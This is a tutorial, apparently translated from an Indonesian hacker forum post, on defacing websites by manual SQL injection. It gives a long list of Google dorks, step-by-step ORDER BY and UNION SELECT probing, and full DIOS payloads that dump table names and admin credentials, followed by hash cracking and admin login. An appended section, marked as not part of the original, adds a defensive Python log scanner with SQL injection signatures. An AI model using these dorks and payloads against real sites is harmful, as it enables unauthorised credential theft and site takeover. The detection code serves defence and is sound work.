Assalamualaikum wr.wb
This time I'm going to share a tutorial on how to deface:
a manual SQL injection POC with DIOS. OK, let's get straight into it.
[#] Materials
1. Dork (develop it further)
inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
inurl:".php?typeid="
inurl:".php?calls="
inurl:".php?pt="
inurl:".php?q="
inurl:".php?prod_cat_main="
inurl:".php?prod_cat="
inurl:".php?gid="
inurl:".php?psid="
inurl:".php?tid="
inurl:".php?brand="
inurl:".php?catld="
inurl:".php?name="
inurl:".php?c_id="
inurl:".php?s_id="
inurl:".php?p_id="
inurl:".php?subtype="
inurl:".php?cateid="
inurl:".php?catepid="
inurl:".php?pttype="
inurl:".php?statusik="
inurl:".php?aid="
inurl:".php?bo_table="
inurl:".php?recordID="
inurl:".php?sel="
inurl:".php?nav_id="
inurl:".php?shopGroupId="
inurl:".php?idsc="
inurl:".php?pc1="
inurl:".php?pno="
inurl:".php?elid="
inurl:".php?for="
inurl:".php?pricat="
inurl:".php?parent_id="
inurl:".php?brand_id="
inurl:".php?pcid="
inurl:".php??product_id="
2. Enough data quota (if you don't have any
3. Patience :v
4. Determination
5. Coffee, cigarettes (to stay chill)
6. DIOS
// Step-by-step deface //
1. First, do some dorking with the dorks above....
2. Pick a target site that looks vulnerable...
I'm using this site
http://www.sitetarget.co.li/news.php?id=1
3. Check whether it's vulnerable or not..
To do that, add a ' to the target..
Example:
http://www.sitetarget.co.li/news.php?id=1
It becomes..
http://www.sitetarget.co.li/news.php?id=1'
If it's vulnerable, something on the target site changes...
E.g.: (Your SQL syntax blah blah blah, a blank page, something changes...)
4. Move on to ORDER BY..
http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
(NO ERROR)
Let's find the error :v
http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
(NO ERROR)
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
(NO ERROR)
http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
(NO ERROR)
(NOW THIS ONE ERRORS)
Move on to UNION SELECT (since we now know the number of columns...)
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-
There... the pretty numbers show up...
3 , 2
We put the DIOS into one of the pretty numbers that showed up..
(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)
It ends up like this...
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-
Next..
We dump the admin username and password
Here's how..
(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)
And this is how it ends up
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-
There you go..
Found the admin username and password :D
Next, find the admin login page (adlog)
If there is one..
Just log in with the username and password we got earlier..
Sometimes.. the password has to be cracked first :v (passwords in the form of algorithms such as MD5, MD4, MD2, SHA1, Base64 and many others)
Once you've logged in successfully..
That's all from me. Hacker greetings😎
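Seen from the server side, the requests in steps 3 and 4 leave a recognisable trail in the web access log. The following is an added example, not part of the original post: a log scanner that URL-decodes each query string, unwraps MySQL versioned comments (`/*!50000...*/`, whose body MySQL 5.0 and later executes as SQL) and flags those request shapes. The signature names, log lines and IP address are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signature names are illustrative; each matches a request shape from the steps above.
SIGNATURES = {
    "dangling_quote": re.compile(r"=[^&'\"]*['\"]$"),      # id=1'
    "order_by_probe": re.compile(r"\border by \d+"),        # column counting
    "union_select": re.compile(r"\bunion (all )?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "user_variable": re.compile(r"@\w+ ?:="),               # @x:= as used by DIOS
    "comment_terminator": re.compile(r"-- ?-?$"),           # trailing --+-
}
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) \S+?\?(\S+) HTTP/')

def normalize(query_string):
    """Reduce a raw query string to roughly what the MySQL parser would see."""
    text = unquote_plus(query_string)            # %27 -> ', + -> space
    text = VERSIONED_COMMENT.sub(r" \1 ", text)  # keep the body, drop the wrapper
    text = PLAIN_COMMENT.sub(" ", text)          # /**/ acts as whitespace
    return re.sub(r"\s+", " ", text).strip().lower()

def classify(query_string):
    """Return the sorted names of all signatures the query string matches."""
    text = normalize(query_string)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_access_log(lines):
    """Return [(client_ip, [signature, ...])] for requests that match anything."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (hits := classify(m.group(2))):
            findings.append((m.group(1), hits))
    return findings

SAMPLE_LOG = [  # constructed lines; 203.0.113.0/24 is a documentation range
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=1%27 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?id=1+order+by+4--+- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /news.php?id=1+union+select+1,2,'
    '(/*!50000select*/(@x:=0x00)/*!50000from*/(information_schema.columns)),4--+- HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, hits in scan_access_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

Matches are a triage signal only; the fix for a page like `news.php?id=` is a parameterised query, so the `id` value is never parsed as SQL.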